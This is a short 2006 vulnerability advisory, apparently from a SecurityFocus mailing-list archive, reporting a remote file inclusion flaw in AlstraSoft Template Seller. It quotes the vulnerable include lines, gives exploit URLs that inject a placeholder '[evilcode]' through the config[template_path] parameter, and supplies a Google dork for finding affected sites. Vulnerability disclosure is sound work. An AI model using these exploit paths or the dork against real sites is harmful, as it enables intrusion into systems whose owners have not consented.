SolpotCrew Advisory #7 - AlstraSoft Template Seller Remote File Include Vulnerability Sep 01 2006 06:24PM
jong_amq hotmail com
#############################SolpotCrew Community################################

#

# AlstraSoft Template Seller Remote File Include Vulnerability

#

# Download file : http://www.alstrasoft.com/template.htm

#

########################################################################
#########

#

#

# Bug Found By : NoGe a.k.a da_jackass

#

# contact: jong_amq (at) hotmail (dot) com [email concealed]

#

# Website : http://nyubicrew.org/adv/Noge_adv_01.txt

#

########################################################################
########

#

#

# Greetz: skulmatic[thanks for sharing knowledge] h4ntu[for the video] olibekas solpotcrew PremanMedan

# yooogy[pa bozz] siwa^lima sagu mousekill ilalang13

# #papmahackerlink #nyubi #maluku-hacker #papuahacker

#

########################################################################
#######

# Vulnerable found in

payment_result.php and spuser_result.php

line 6 include("$config[template_path]/onlyheader.php");

line 7 include("$config[template_path]/onlysearch.php");

# Exploit

/payment/payment_result.php?config[template_path]=[evilcode]

/payment/spuser_result.php?config[template_path]=[evilcode]

# google dork

"Powered by AlstraSoft Template Seller"

######################################E.O.F#############################
#####

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus